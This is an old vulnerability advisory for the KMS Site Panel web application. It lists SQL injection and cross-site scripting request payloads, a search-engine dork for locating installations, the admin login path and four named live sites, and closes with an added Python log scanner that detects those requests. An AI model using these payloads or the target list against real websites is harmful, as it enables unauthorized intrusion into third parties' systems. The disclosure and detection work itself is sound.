KMS Site Panel Multiple Vulnerabilities

2011.08.12
Credit: alieye
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

"KMS Site Panel Multiple Vulnerabilities"

Author: alieye
E-mail: cseye_ut@yahoo.com
Vendor: http://www.mediasoft.ir/
Version: All versions
Class: remote
Google dork (lang=Farsi): "طراحي و اجراي سايت: شركت رایان رسانه كیش"

We Are: Alieye, Z0d14c, Bully13, Alichi & All Iranian Hackers
greetz: C.S.Eye Security Team members
Site: www.gcmt.vcp.ir, blog: www.cseye.blogfa.com
----------------------------------------------------------------
Blind SQL Injection

1-/index.php?PageID=43-2+2*3-6
2-/index.php?ATPID=5&PSID=4-2+2*3-6
----------------------------------------------------------------
Cross Site Scripting

3-/index.php?ATPID=5&PSID=<ScRiPt >prompt(989309)</ScRiPt>&VID=5
4-input SearchText set to <ScRiPt >prompt(989309)</ScRiPt>
----------------------------------------------------------------
SQL injection

5-/index.php?ATPID=4'
6-/index.php?ATPID=4&PSID=2'
7-/index.php?PageID=45'
----------------------------------------------------------------
login page

http://site/CP/CP.php
----------------------------------------------------------------
demo website:

http://www.kish-hospital.com/
http://kishtourism.ir/
http://www.kishmalls.net/
http://www.shahrsazan.com/
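
Every request listed above puts non-numeric content into an identifier parameter or markup into the search field, so strict parameter validation is enough to spot them in web-server logs. The script below is an added example, not part of the original advisory or the vendor's code. It assumes PageID, ATPID, PSID and VID are integer-only, that SearchText arrives as a query parameter, and it runs over constructed log lines.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Identifier parameters named in the advisory; assumed here to be integer-only.
NUMERIC_PARAMS = {"PageID", "ATPID", "PSID", "VID"}
# Search field from item 4; assumed here to arrive as a query parameter.
TEXT_PARAMS = {"SearchText"}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def audit_target(target):
    """Return (param, reason) findings for one request target."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]{1,10}", value):
            # Catches arithmetic probes, stray quotes and injected markup alike.
            findings.append((name, "non-integer id"))
        elif name in TEXT_PARAMS and re.search(r"[<>]", value):
            findings.append((name, "markup in search text"))
    return findings

def scan_log(lines):
    """Return (client, param, reason) for every suspicious request in the log."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m:
            hits += [(m.group(1), p, r) for p, r in audit_target(m.group(2))]
    return hits

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Aug/2011:10:00:01 +0000] "GET /index.php?PageID=43 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Aug/2011:10:00:05 +0000] "GET /index.php?PageID=43-2+2*3-6 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Aug/2011:10:00:06 +0000] "GET /index.php?ATPID=5&PSID=4-2+2*3-6 HTTP/1.1" 200 4800',
    '198.51.100.7 - - [12/Aug/2011:10:00:07 +0000] "GET /index.php?ATPID=5&PSID=%3CScRiPt%20%3Eprompt(989309)%3C/ScRiPt%3E&VID=5 HTTP/1.1" 200 4800',
    '198.51.100.7 - - [12/Aug/2011:10:00:08 +0000] "GET /index.php?SearchText=%3CScRiPt%20%3Eprompt(989309)%3C/ScRiPt%3E HTTP/1.1" 200 3900',
    '198.51.100.7 - - [12/Aug/2011:10:00:09 +0000] "GET /index.php?ATPID=4&PSID=2%27 HTTP/1.1" 500 312',
    '192.0.2.44 - - [12/Aug/2011:10:01:00 +0000] "GET /index.php?SearchText=kish+hotel HTTP/1.1" 200 3900',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

The same integer check, applied server-side before the value reaches a query or the page output, rejects all seven request forms in the advisory.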

References:

http://www.mediasoft.ir/


Copyright 2024, cxsecurity.com

 
